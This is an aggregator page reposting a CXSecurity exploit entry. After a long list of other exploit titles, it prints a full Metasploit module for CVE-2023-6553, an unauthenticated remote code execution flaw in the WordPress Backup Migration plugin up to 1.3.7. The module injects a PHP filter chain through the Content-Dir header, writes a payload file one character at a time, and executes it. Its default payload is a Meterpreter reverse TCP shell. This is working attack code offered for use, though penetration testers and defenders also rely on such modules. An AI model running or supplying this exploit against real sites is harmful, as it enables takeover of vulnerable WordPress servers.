惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
Google Developers Blog
Google DeepMind News
Google DeepMind News
Hugging Face - Blog
Hugging Face - Blog
D
Docker
F
Fortinet All Blogs
博客园 - 三生石上(FineUI控件)
Project Zero
Project Zero
Engineering at Meta
Engineering at Meta
J
Java Code Geeks
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Simon Willison's Weblog
Simon Willison's Weblog
S
Security Affairs
NISL@THU
NISL@THU
T
Tor Project blog
A
About on SuperTechFans
宝玉的分享
宝玉的分享
腾讯CDC
S
Schneier on Security
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
P
Privacy & Cybersecurity Law Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Stack Overflow Blog
Stack Overflow Blog
P
Privacy International News Feed
雷峰网
雷峰网
C
Cyber Attacks, Cyber Crime and Cyber Security
Vercel News
Vercel News
Cisco Talos Blog
Cisco Talos Blog
D
DataBreaches.Net
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Google Online Security Blog
Google Online Security Blog
Recorded Future
Recorded Future
L
LINUX DO - 热门话题
Microsoft Security Blog
Microsoft Security Blog
Latest news
Latest news
C
Check Point Blog
有赞技术团队
有赞技术团队
T
The Exploit Database - CXSecurity.com
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
云风的 BLOG
云风的 BLOG
SecWiki News
SecWiki News
Application and Cybersecurity Blog
Application and Cybersecurity Blog
爱范儿
爱范儿
月光博客
月光博客
V
Vulnerabilities – Threatpost
T
Threat Research - Cisco Blogs
P
Palo Alto Networks Blog
T
The Blog of Author Tim Ferriss
C
Cisco Blogs
Webroot Blog
Webroot Blog
S
Security @ Cisco Blogs

CXSECURITY Database RSS Feed - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution Linux nf_tables 6.19.3 Local Privilege Escalation ThingsBoard IoT Platform 4.2.0 Server-Side Request Forgery (SSRF) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300) SUSE Manager 4.3.15 Code Execution Apache HertzBeat 1.8.0 Remote Code Execution JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution NiceGUI 3.6.1 Path Traversal - CXSecurity.com GUnet OpenEclass E-learning platform < 4.2 Remote Code Execution (RCE) Windows Snipping Tool NTLMv2 Hash Hijack telnetd 2.7 Buffer Overflow - CXSecurity.com Kukurigu LPE - Linux Kernel Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Event Booking Calendar-5.0 Cross-site scripting (reflected) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Ninja Forms Uploads Unauthenticated PHP File Upload Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking (CSWSH) Erugo 0.2.14 Remote Code Execution (RCE) Linux Kernel Local Privilege Escalation via Memory Handling and Access Control Weakness Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Linux Kernel proc_readdir_de() 6.18-rc5 Local Privilege Escalation Insecure Permissions vulnerability in Nagios Network Analyzer v.2024R1.02-64 and before allows a local attacker to escalate privileges via the remove_source.sh component. Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation solaredge-CSRF-OOB-Injection - CXSecurity.com Trojan-Spy.Win32.Small / Remote Command Execution OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation Critical Remote Code Execution Vulnerability in Windows Internet Key Exchange (IKE) Service (CVE-2026-33824) WordPress Madara Local File Inclusion FortiWeb 8.0.2 Remote Code Execution Easy File Sharing Web Server v7.2 Buffer Overflow NetBT e-Fatura Privilege Escalation - CXSecurity.com Docker Desktop 4.44.3 Unauthenticated API Exposure MaNGOSWebV4 4.0.6 Reflected XSS - CXSecurity.com Grafana 11.6.0 SSRF - CXSecurity.com OctoPrint 1.11.2 File Upload - CXSecurity.com esm-dev 136 Path Traversal - CXSecurity.com Linux Kernel mseal Invariant Violation (Linux kernel 6.17-7.0 rc5) astrojs/vercel <= 10.0.0 - Unauthenticated x-astro-path Header Path Override Microsoft SQL Server Privilege Elevation Through FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Wavlink WL-WN579X3-C firewall.cgi UPNP Stack-based Buffer Overflow esiclivre 0.2.2 SQL Injection - CXSecurity.com Payara Server Cross Site Scripting esiclivre 0.2.2 SQL Injection - CXSecurity.com SiYuan <= v3.6.1 Note unauthenticated arbitrary file read (path traversal) Tenda AC21 V1.0 V16.03.08.16 - Stack Buffer Overflow in SetNetControlList WWBN AVideo <= 26.0 - Authenticated SQL Injection Windows RRAS Remote Code Execution Vulnerability (CVE-2026-26111) - SE-RCE Exploit Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation Exploit Discourse <= 2026.2.1 Authenticated Missing Authorization Kanboard <= 1.2.50 Authenticated SQL Injection Glances <= 4.5.2 OS Command Injection via Mustache Template Fields LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg LB-LINK BL-WR9000 V2.4.9 - Unauthenticated / Post-Auth Stack-based Buffer Overflow zumba/json-serializer zumba/json-serializer < 3.2.3 RCE Wekan 8.31.0 - 8.33Meteor DDP notificationUsers Sensitive Data Leak Splunk Remote Command Execution via Improper Input Validation Microsoft Windows MSHTML Security Feature Bypass Vulnerability Qualcomm GPU Driver Memory Corruption Vulnerability in Android Devices Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection PyJWT < 2.12.0 crit header bypass / Insufficient crit validation PluckCMS 4.7.10 Unrestricted File Upload Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486) WeGIA <= 3.6.4 Unauthenticated Admin Authentication Bypass NocoDB <= 0.301.2 User Enumeration via Password Reset Endpoint Craft CMS 4.x & 5.x RCE via Blocklist Bypass pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT AirPlay Dual‑Mode Discovery Scanner for Flipper Zero ESP32 WiFi Dev Board WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection WeGIA 3.5.0 SQL Injection - CXSecurity.com
WordPress Backup Migration 1.3.7 Remote Command Execution
2026-03-03 · via CXSECURITY Database RSS Feed - CXSecurity.com

# Exploit Title: WordPress Backup Migration 1.3.7 - Remote Command Execution # Date: 2025-10-26 # Exploit Author: DANG # Vendor Homepage: https://backupbliss.com/ # Software Link: https://wordpress.org/plugins/backup-backup/ # Version: Backup Migration ≤1.3.7 # Tested on: LINUX # CVE : CVE-2023-6553 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HTTP::PhpFilterChain include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Backup Migration Plugin PHP Filter Chain RCE', 'Description' => %q{ This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint. The exploit makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversions. This allows an attacker to prepend a PHP payload to a string which gets evaluated by a require statement, which results in command execution. }, 'Author' => [ 'Nex Team', # Vulnerability discovery 'Valentin Lobstein', # PoC 'jheysel-r7' # msfmodule ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-6553'], ['URL', 'https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py'], ['URL', 'https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it'], ['WPVDB', '6a4d0af9-e1cd-4a69-a56c-3c009e207eca'] ], 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => '2023-12-11', 'DefaultTarget' => 0, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('PAYLOAD_FILENAME', [ true, 'The filename for the payload to be used on the target host (%RAND%.php by default)', Rex::Text.rand_text_alpha(4) + '.php']), ] ) end def check return CheckCode::Unknown unless wordpress_and_online? wp_version = wordpress_version print_status("WordPress Version: #{wp_version}") if wp_version # The plugin's official name seems to be Backup Migration however the package filename is "backup-backup" check_code = check_plugin_version_from_readme('backup-backup', '1.3.8') if check_code.code != 'appears' return CheckCode::Safe end plugin_version = check_code.details[:version] print_good("Detected Backup Migration Plugin version: #{plugin_version}") CheckCode::Appears end def send_payload(payload) php_filter_chain_payload = generate_php_filter_payload(payload) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', 'backup-heart.php'), 'method' => 'POST', 'headers' => { 'Content-Dir' => php_filter_chain_payload } ) fail_with(Failure::Unreachable, 'Connection failed') if res.nil? fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 200 response code') unless res.code == 200 end def write_to_payload_file(string_to_write) # Because the payload is base64 encoded and then each character is translated into it's corresponding php filter chain, # the payload becomes quite large and we start to hit limitations due to the HTTP header size. # For example this payload: "<?php fwrite(fopen("G", "a"),"\x73");?>", ends up being 7721 characters long. # The payload size limit on the target I was testing seemed to be around 8000 characters. # Using the following: <?php file_put_contents("file.php","char",FILE_APPEND);?> (more elegant solution) exceeds the # size limit which is why I ended up using <?php fwrite(fopen("<single_char_filename>", "char" ?> and then after # copying the single_char_filename to a filename with a .php extension to be executed. single_char_filename = Rex::Text.rand_text_alpha(1) string_to_write.each_char do |char| send_payload("<?php fwrite(fopen(\"#{single_char_filename}\",\"a\"),\"#{'\\x' + char.unpack('H2')[0]}\");?>") end register_file_for_cleanup(single_char_filename) send_payload("<?php copy(\"#{single_char_filename}\",\"#{datastore['PAYLOAD_FILENAME']}\");?>") register_file_for_cleanup(datastore['PAYLOAD_FILENAME']) end def trigger_payload_file res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', datastore['PAYLOAD_FILENAME']), 'method' => 'GET' ) print_warning('The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.') if res end def exploit print_status('Writing the payload to disk, character by character, please wait...') # Use double quotes in the payload, not single. write_to_payload_file("<?php #{payload.encoded}") trigger_payload_file end end